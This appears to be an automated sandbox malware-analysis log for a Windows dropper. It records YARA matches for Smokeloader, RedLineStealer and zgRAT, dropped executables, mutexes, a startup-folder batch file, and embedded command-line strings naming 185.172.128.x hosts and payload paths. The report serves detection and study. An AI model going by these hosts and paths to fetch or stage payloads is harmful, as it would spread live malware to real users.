                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 041C1BE3 appears 40 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 041C36F8 appears 130 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 004275A4 appears 43 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 05BB1BE3 appears 40 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 05BB1D46 appears 39 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 05BD780B appears 43 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 05BB9F27 appears 48 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 00409CC0 appears 48 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 05BB36F8 appears 130 times
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF6385CB330 appears 52 times
                        Source: file.exeStatic PE information: invalid certificate
                        Source: V4R2L1ofXzAhB4UFI0Rj2LED.exe.3.drStatic PE information: Resource name: RT_CURSOR type: COM executable for DOS
                        Source: V4R2L1ofXzAhB4UFI0Rj2LED.exe.3.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe.3.drStatic PE information: Resource name: RT_CURSOR type: COM executable for DOS
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe.3.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                        Source: OFQ7ZJkbPO93pwjUuJw87q34.exe.3.drStatic PE information: Resource name: RT_CURSOR type: COM executable for DOS
                        Source: OFQ7ZJkbPO93pwjUuJw87q34.exe.3.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                        Source: QV2CtvThMWBnTkQtNtmINgo7.exe.3.drStatic PE information: Resource name: RT_CURSOR type: COM executable for DOS
                        Source: QV2CtvThMWBnTkQtNtmINgo7.exe.3.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                        Source: ra8RK0HZwqsQsFKuKAOljczn.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: 01ySZukOlUcP5NF6FSceJyuX.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: XqzL1fMvCxCCFKp0SSzKRmTk.exe.3.drStatic PE information: Resource name: RT_CURSOR type: COM executable for DOS
                        Source: XqzL1fMvCxCCFKp0SSzKRmTk.exe.3.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                        Source: bfxtyeVJT5bBfIUy0v6XVgPU.exe.3.drStatic PE information: Resource name: RT_CURSOR type: COM executable for DOS
                        Source: bfxtyeVJT5bBfIUy0v6XVgPU.exe.3.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                        Source: nMCfbx6hx0DUWGYJuDAMUAIJ.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: ugGFIzLnD3Xk89zL7XSYeDGh.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: 3CfyWUQfEPMLfwgMw9RKzj9q.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: 0Flev5sTDyJ3duKpLfv5ka2Z.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: Fh7qhqxo9lqcq8fZJGpCZFiC.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: 0DWhHyQpdxsJp4gA1M0WjqnA.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: CzCAVDbVcAMwrBna8hMGEVEa.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: IiFh1rXOMpGB7BnxmUig3wkQ.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: jZXBdg5rull5j6LgJCWVgVos.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: 8FauF1Ec16N4pbn45vApMB9Y.exe.3.drStatic PE information: Resource name: RT_CURSOR type: COM executable for DOS
                        Source: 8FauF1Ec16N4pbn45vApMB9Y.exe.3.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                        Source: file.exeBinary or memory string: OriginalFilename vs file.exe
                        Source: file.exe, 00000000.00000002.1323600743.0000027F3A471000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs file.exe
                        Source: file.exe, 00000000.00000002.1326287625.0000027F49071000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameayuUIPawoT8 vs file.exe
                        Source: file.exe, 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameayuUIPawoT8 vs file.exe
                        Source: file.exe, 00000000.00000002.1323600743.0000027F39A71000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs file.exe
                        Source: 00000015.00000002.1918521862.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 00000029.00000002.2099601729.00000000041B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 00000013.00000002.1917490394.000000000418C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 00000027.00000002.2175970589.000000000418C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 00000022.00000002.2122134547.00000000043D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 00000029.00000002.2100222351.00000000043EC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 0000000B.00000002.2255300318.000000000411C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 00000004.00000002.2259248364.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 00000027.00000002.2184889083.0000000004440000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 0000001D.00000002.1939799886.000000000439C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 00000022.00000002.2121373428.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 0000001D.00000002.1938329589.0000000004300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 0000001B.00000002.1937757105.000000000408C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 00000015.00000002.1930196904.000000000434C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 0000001B.00000002.1940278884.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPEDMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@208/425@0/45
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385D4AD0 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF6385D4AD0
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_040CCCD6 CreateToolhelp32Snapshot,Module32First,4_2_040CCCD6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeMutant created: \BaseNamedObjects\Global\1_H69925949
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeMutant created: \Sessions\1\BaseNamedObjects\Global\BCClipboard {538F9E0A-E997-4AD2-8CB0-C8E991C010EF}
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeMutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_11
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeMutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_12
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5204:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeMutant created: \Sessions\1\BaseNamedObjects\BCClipboard {538F9E0A-E997-4AD2-8CB0-C8E991C010EF}
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeFile created: C:\Users\user\AppData\Local\Temp\u5v8.0.exeJump to behavior
                        Source: Yara matchFile source: 35.0.u69w.1.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000029.00000003.2080394798.0000000006A3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000003.1847945255.0000000006A38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.2086147863.0000000006A37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000000.1537903237.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000003.2095182963.0000000006A3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1624901520.0000000006A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1635257524.0000000006A1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.1674965384.0000000006B5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u624.1.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u69w.1.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u33c.1.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u4dc.1.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u1hw.1.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u4hg.1.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u46g.1.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u2r8.1.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u5v8.1.exe, type: DROPPED
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat" "
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: one4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: one4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: two4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: two4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: three4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: three4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: four4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: four4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: five4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: five4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: six4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: six4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: seven4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: seven4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: eight4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: eight4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: nine4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: nine4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: ten4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: ten4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: one4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: two4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: three4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: four4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: five4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: six4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: seven4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: eight4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: nine4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: ten4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: 185.172.128.904_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: 185.172.128.904_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: 185.172.128.904_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: Installed4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: Installed4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: 185.172.128.2284_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: 185.172.128.2284_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: 185.172.128.2284_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: 185.172.128.594_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: 185.172.128.594_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: /syncUpd.exe4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: /syncUpd.exe4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: 185.172.128.594_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: /syncUpd.exe4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: /1/Qg_Appv5.exe4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: /1/Qg_Appv5.exe4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: /1/Qg_Appv5.exe4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: Qg_Appv5.exe4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: Qg_Appv5.exe4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: 185.172.128.2284_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: 185.172.128.2284_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: /BroomSetup.exe4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: /BroomSetup.exe4_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: 185.172.128.2284_2_00424B3E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCommand line argument: /BroomSetup.exe4_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: one11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: one11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: two11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: two11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: three11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: three11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: four11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: four11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: five11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: five11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: six11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: six11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: seven11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: seven11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: eight11_2_00424B3E
